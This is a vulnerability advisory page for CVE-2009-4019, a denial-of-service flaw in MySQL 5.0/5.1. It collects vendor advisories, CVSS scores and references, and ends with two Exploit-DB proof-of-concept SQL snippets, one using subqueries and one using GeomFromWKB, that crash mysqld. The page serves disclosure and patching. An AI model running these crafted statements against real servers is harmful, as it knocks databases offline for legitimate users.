CVE-2009-4019
published 2009-11-30CVE-2009-4019: mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries…
PriorityP423medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
16.26%
96.6th percentile
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
Affected
81 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
| mysql | mysql | — | — |
CVSS provenance
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:N/I:N/A:P
vendor_ubuntu4.6MEDIUM
vendor_redhat4.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-03-12
CVE-2007-5925 MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
Multiple security issues were discovered in MySQL and this update includes
new upstream MySQL versions to fix these issues.
MySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10,
Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to
MySQL 5.0.95.
In addition to security fixes, the updated packages contain bug fixes, new
features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2010-02-10·CVSS 4.6
CVE-2008-7247 [MEDIUM] MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: MySQL vulnerabilities
It was discovered that MySQL could be made to overwrite existing table
files in the data directory. An authenticated user could use the DATA
DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.
This update alters table creation behaviour by disallowing the use of the
MySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This
issue only affected Ubuntu 8.10. (CVE-2008-4098)
It was discovered that MySQL contained a cross-site scripting vulnerability
in the command-line client when the --html option is enabled. An attacker
could place arbitrary web script or html in a database cell, which would
then get placed in the html document output by the command-line tool. This
issue only affected Ubuntu
Red Hat
mysql: DoS (crash) when comparing GIS items from subquery and when handling subqueires in WHERE and assigning a SELECT result to a @variable
vendor_redhat·2009-11-04·CVSS 4.0
CVE-2009-4019 [MEDIUM] mysql: DoS (crash) when comparing GIS items from subquery and when handling subqueires in WHERE and assigning a SELECT result to a @variable
mysql: DoS (crash) when comparing GIS items from subquery and when handling subqueires in WHERE and assigning a SELECT result to a @variable
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
GHSA
GHSA-pvv2-gf98-5mv3: mysqld in MySQL 5
ghsa_unreviewed·2022-05-02
CVE-2009-4019 [MEDIUM] GHSA-pvv2-gf98-5mv3: mysqld in MySQL 5
mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
No detection rules found.
Exploit-DB
MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
exploitdb·2009-11-23
CVE-2009-4019 MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
---
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`)
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;
Exploit-DB
MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
exploitdb·2009-11-23
CVE-2009-4019 MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
---
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);
http://bugs.mysql.com/47780http://bugs.mysql.com/48291http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.htmlhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.htmlhttp://lists.apple.com/archives/security-announce/2010//Mar/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.htmlhttp://marc.info/?l=oss-security&m=125881733826437&w=2http://marc.info/?l=oss-security&m=125883754215621&w=2http://marc.info/?l=oss-security&m=125901161824278&w=2http://secunia.com/advisories/37717http://secunia.com/advisories/38517http://secunia.com/advisories/38573http://support.apple.com/kb/HT4077http://ubuntu.com/usn/usn-897-1http://www.debian.org/security/2010/dsa-1997http://www.redhat.com/support/errata/RHSA-2010-0109.htmlhttp://www.ubuntu.com/usn/USN-1397-1http://www.vupen.com/english/advisories/2010/1107https://bugzilla.redhat.com/show_bug.cgi?id=540906https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11349https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8500https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00764.htmlhttp://bugs.mysql.com/47780http://bugs.mysql.com/48291http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.htmlhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.htmlhttp://lists.apple.com/archives/security-announce/2010//Mar/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.htmlhttp://marc.info/?l=oss-security&m=125881733826437&w=2http://marc.info/?l=oss-security&m=125883754215621&w=2http://marc.info/?l=oss-security&m=125901161824278&w=2http://secunia.com/advisories/37717http://secunia.com/advisories/38517http://secunia.com/advisories/38573http://support.apple.com/kb/HT4077http://ubuntu.com/usn/usn-897-1http://www.debian.org/security/2010/dsa-1997http://www.redhat.com/support/errata/RHSA-2010-0109.htmlhttp://www.ubuntu.com/usn/USN-1397-1http://www.vupen.com/english/advisories/2010/1107https://bugzilla.redhat.com/show_bug.cgi?id=540906https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11349https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8500https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00764.html
2009-11-30
Published